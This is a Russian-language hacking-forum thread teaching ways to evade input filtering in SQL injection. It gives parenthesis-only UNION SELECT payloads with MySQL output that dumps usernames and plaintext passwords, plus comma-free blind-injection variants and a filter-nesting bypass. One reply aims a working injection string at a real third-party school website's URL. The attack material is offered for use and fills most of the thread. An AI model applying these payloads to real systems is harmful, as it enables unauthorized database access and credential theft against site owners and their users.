Форум АНТИЧАТ - Небольшой очерк 2

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Небольшой очерк 2 - Фильтрация (https://forum.antichat.xyz/showthread.php?t=125796)

Небольшой очерк 2 - Фильтрация

Тянет меня видимо раз в полгода писать что то подобное.
Суть очерка - показать возможность выкрутиться при sql-inj и составить нормальный запрос обходя фильтрацию спецсимволов в GPC:

-Пробел %2B, +
-Табуляция %09
-Возврат каретки %0D
-Перевод строки %0A
-Составляющие комментариев -, /, *

*Примечание: дальнейшее описание имеет смысл только если после уязвимого параметра в теле запроса нет ничего что бы могло помешать логике, и не
пришлось бы использовать комментарии

1. Например вот такой скрипт фильтрации:

PHP код:


		
			
$str = str_replace('/', '',

       str_replace('*', '',

       str_replace('=', '',

       str_replace('+', '',

       str_replace(' ', '',

       str_replace('%2B', '',

       str_replace('%0B', '',

       str_replace('%09', '',

       str_replace('$0D', '',

       str_replace('%0A', '', $str))))))))));

Видно что он всё порежет. Тут помогут скобки ( ) , с их помощью можно вообще не пользоваться какими либо другими разделителями инструкций/выражений etc.

2. PoC

Код:

mysql> select * from news;

+---------+-----------+------------+---------------+

| news_id | news_name | news_theme | news          |

+---------+-----------+------------+---------------+

|       1 | news1     | theme1     | newsnewsnews1 |

|       2 | news2     | theme2     | newsnewsnews2 |

+---------+-----------+------------+---------------+

2 rows in set

 

mysql> select * from users;

+----+----------+--------+--------------+

| id | username | pwd    | email        |

+----+----------+--------+--------------+

|  1 | admin    | 12345  | 1234@1234.ru |

|  2 | user     | qwerty | user@123.ru  |

|  3 | user1    | 0000   | ffff@fff.ru  |

+----+----------+--------+--------------+

3 rows in set

---

Код:

mysql> select news_name, news_theme, news from news where news_id=1;

Допустим параметр news_id как раз мы можем изменить, тогда:

Код:

mysql> select news_name, news_theme, news from news where news_id=(-1)union(select(1),(2),(3));

+-----------+------------+------+

| news_name | news_theme | news |

+-----------+------------+------+

| 1         | 2          | 3    |

+-----------+------------+------+

1 row in set

Ну вы понели..
---

Код:

mysql> select news_name, news_theme, news from news where news_id=(-1)union(select(concat_ws(0x3a,id,username,pwd,email)),(concat_ws(0x3a,database(),user())),(null)from(users)where(id)like(1));

+----------------------------+---------------------+------+

| news_name                  | news_theme          | news |

+----------------------------+---------------------+------+

| 1:admin:12345:1234@1234.ru | test:root@localhost | NULL |

+----------------------------+---------------------+------+

1 row in set

Фильтр успешно обходится. Дальше только ваша фантазия.

3 ...
4 PROFIT

PS
Кстати встречались такие цмс, где приходилось обходиться скобками. Редко, но бывает.
PPS Примеров можно приводить море, но направление я дал, дальше уже и сами сможете потестить.
PPPS Если не понятна логика построения таких запросов, спрашивайте.

eof

Мой пост можете не читать :)

Цитата:

Сообщение от .Slip

1. Например вот такой скрипт фильтрации:

PHP код:


		
			
$str = str_replace('/', '',

       str_replace('*', '',

       str_replace('=', '',

       str_replace('+', '',

       str_replace(' ', '',

       str_replace('%2B', '',

       str_replace('%09', '',

       str_replace('$0D', '',

       str_replace('%0A', ''))))))));

Конечно класно, но такой код жесть) Хотя б уже сделал

PHP код:


		
			
str_replace(array("/","*","итд"), $str);

Нашли до чего доебаться, суть не в этом

вообще-то боян страшный..

баян, но ладно)
Слип молодец :-*

Как к примеру сюда применить?

так работает

Цитата:

http://www.tauntonschool.co.uk/foundation/index.php?id=-1'+union+select+1,2,3,4+--+

так не работает

Цитата:

http://www.tauntonschool.co.uk/foundation/index.php?id=(-1)union(select(1),(2),(3),(4));

farpost, http://www.tauntonschool.co.uk/foundation/index.php?id=(-1)'union(select(1),(2),(3),(4))--+
Только хз зачем тебе это, я же написал что это редкий случай когда нельзя обойтись без пробела и комментариев.

кстати про %0b забыл

Я пока ниразу не встречал, где бы это нужно было)
Но спасибо, буду знать ;)

Ну попробуем развивать тему, не знаю было такое уже или нет.
Иногда встречаются супер-пупер фильтры которые при обнаружении конструкции типа substring((select),1,1) зарубают всё удовольствие.

Аналог substring() - mid()

Так же хочу отметить, что обходиться без запятой в слепых инъекциях вполне реально:

substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

Хотя накладка появляется - нужно знать какую либо колонку по которой можно перебирать строки таблицы.

Если нужно обходиться без запятых, так же можно применить:

limit 0,1 <=> limit 1 offset 0
if((a),b,c) <=> case when (a) then b else c

Пример запроса https://forum.antichat.ru/showpost.php?p=1696686&postcount=48 см внизу

substring(version(),1,1) = mid(version(),1,1) = substr(version(),1,1) = right(left(version(),1),1)

[Raz0r]Описывал уже нечто подобное в своём блоге.
можно ещё по другому обойти,

Цитата:

$str = str_replace('/', '',
str_replace('*', '',
....
str_replace('%0A', '', $str))))))))));

Отправляем %*0A
Фильтр обрежет *, и останеться %0A.

Цитата:

Сообщение от Ctacok

[Raz0r]Описывал уже нечто подобное в своём блоге.
можно ещё по другому обойти,

Отправляем %*0A
Фильтр обрежет *, и останеться %0A.

А ты находишь разницу между вырезанием символов из переменной и их поиском в ней?
Мы тут как бы вкладываем аналогичные конструкции, а не обсуждаем конкретные фильтры.